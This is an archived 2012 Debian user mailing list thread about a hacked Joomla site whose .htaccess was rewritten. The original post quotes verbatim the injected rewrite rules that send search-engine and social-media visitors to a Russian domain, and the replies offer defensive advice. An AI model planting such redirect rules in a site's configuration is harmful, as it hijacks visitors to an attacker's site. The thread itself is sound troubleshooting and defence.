Re: Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
On Wed, 22 Aug 2012 16:32:01 -0300, Dr Beco wrote: Does anyone knows how to protect against unauthorized change of .htaccess? Uninstalling WordPress/Joomla/PHP-Nuke and all that frameworking stuff? Just kidding, but having this pre-made environments on you server it poses a real risk, you have to care they are always updated and using the latests patches. (...) http://productforums.google.com/forum/#!topic/webmasters/GsB423gsIlk (...) I know it is easy to fix. I just wonder if I can prevent that to happen again. I'm considering to simple put a cron job that rewrites my .htaccess from time to time! :) Anyone else saw this problem? At the Google forum there's a link it can help you with this: http://www.mastermindblogger.com/2011/14-ways-to-prevent-your-wordpress-blog-from-being-hacked/ So I guess there has to be a bunch of how to protect joomla articles out there. Greetings, -- Camaleón -- To UNSUBSCRIBE, email to debian-user-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/k182vj$k87$7...@ger.gmane.org
Re: Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
On 23/08/2012 3:32 AM, Dr Beco wrote: One of my sites, that has joomla (and not wordpress) also got hacked (again). Is your Joomla along with all components/skins etc. up to date? Many of the hacked sites I look at are not up to date. the sysadmin told me that there was a php script entitled jos_jpxn.php running that was rewriting my .htaccess (lickface) I quite often see Joomla sites that get hacked have a few PHP shells dropped around the place that the attacker then uses to do other things (reset passwords/change htaccess files/phising sites etc.). Also, if it is shared web hosting are your permissions all set correctly? Do you know how PHP is configured on the server? If the permissions are wrong say on the configuration file and another site on the same server gets hacked, they may be able to read your configuration file, get the database details and reset/recover the admin password. Personally I wouldn't trust a Joomla/Wordpress/whatever install once the site has been comprimised like this - who knows what else has been changed. It may be best to reupload the site/database from a backup if you have one. -- To UNSUBSCRIBE, email to debian-user-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/5035cd63.9000...@shthead.net
Re: Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
--- On Thu, 8/23/12, shthead li...@shthead.net wrote: From: shthead li...@shthead.net Subject: Re: Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9 To: debian-user@lists.debian.org Date: Thursday, August 23, 2012, 1:27 AM On 23/08/2012 3:32 AM, Dr Beco wrote: One of my sites, that has joomla (and not wordpress) also got hacked (again). Is your Joomla along with all components/skins etc. up to date? Many of the hacked sites I look at are not up to date. You are not alone. Noy long ago my webhost posted an announcement about Joomla and Wordpress sites on their servers getting hacked. Make sure you're updated to the latest version. -- To UNSUBSCRIBE, email to debian-user-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/1345726481.39670.yahoomailclas...@web163402.mail.gq1.yahoo.com
Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
Dear debianusers, Does anyone knows how to protect against unauthorized change of .htaccess? I googled the htttp://reltime2012.ru/frunleh?9 redirect problem and found out that a lot of sites (mainly using wordpress) got hacked and is redirected to a russian site. One of my sites, that has joomla (and not wordpress) also got hacked (again). In the beginning of the .htaccess one can read: RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ htttp://reltime2012.ru/frunleh?9 [R=301,L] I find some tutorials on how to fix the problem, http://newmediamike.com/2012/07/reltime-2012-frunleh-redirection/ http://wptrainingonline.com/ But none of them explains how to protect and prevent the problem to happen again. This google's forum has a post stating that http://productforums.google.com/forum/#!topic/webmasters/GsB423gsIlk the sysadmin told me that there was a php script entitled jos_jpxn.php running that was rewriting my .htaccess (lickface) But I found no such script among my files. (Of course, I changed my password, but I don't really think that is the problem...) I know it is easy to fix. I just wonder if I can prevent that to happen again. I'm considering to simple put a cron job that rewrites my .htaccess from time to time! :) Anyone else saw this problem? Thanks, Beco -- Dr. Beco A.I. research, Cognitive Scientist and Philosopher Linux Counter #201942 -- To UNSUBSCRIBE, email to debian-user-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/caluyw2xm0z0ebijgexpjyh0npklxaj11eb4idyatoxvuw6m...@mail.gmail.com
Re: Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
On Wed, 22 Aug 2012, Dr Beco wrote: Does anyone knows how to protect against unauthorized change of .htaccess? If you have root access, try to use chattr to mark that file as immutable (chattr +i). But really, if they keep changing your .htaccess, it means they have compromised the box, and will remain compromising it until you clean the box (probably rebuild from scratch) AND close the security holes. -- One disk to rule them all, One disk to find them. One disk to bring them all and in the darkness grind them. In the Land of Redmond where the shadows lie. -- The Silicon Valley Tarot Henrique Holschuh -- To UNSUBSCRIBE, email to debian-user-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20120822194159.ga29...@khazad-dum.debian.net
Re: Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
Henrique de Moraes Holschuh, Wed, 22 Aug 2012 16:41:59 -0300: If you have root access, try to use chattr to mark that file as immutable (chattr +i). But really, if they keep changing your .htaccess, it means they have compromised the box, and will remain compromising it until you clean the box (probably rebuild from scratch) AND close the security holes. Dear Henrique, For this system I don't have root access. It is managed abroad by a host farm. I already wrote to them to report the (second) problem. I hope they find the main problem now, instead of just giving another quick fix. Also, I cannot ask them to reinstall the system from scratch, as the same server hosts more websites. Thanks! Beco -- Dr. Beco A.I. research, Cognitive Scientist and Philosopher Linux Counter #201942 -- To UNSUBSCRIBE, email to debian-user-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/CALuYw2yDehk99ygBD+anf+FbJ+WT2J2MJ6KMpMQ=nqophdq...@mail.gmail.com
Re: Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
On Wed, 22 Aug 2012, Dr Beco wrote: For this system I don't have root access. It is managed abroad by a host farm. I already wrote to them to report the (second) problem. I suggest you take your business elsewhere. You don't want to risk your name/site/domain being associated with criminals because of some el-cheap-o hosting farm can't do their job properly. -- One disk to rule them all, One disk to find them. One disk to bring them all and in the darkness grind them. In the Land of Redmond where the shadows lie. -- The Silicon Valley Tarot Henrique Holschuh -- To UNSUBSCRIBE, email to debian-user-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20120823004420.gb19...@khazad-dum.debian.net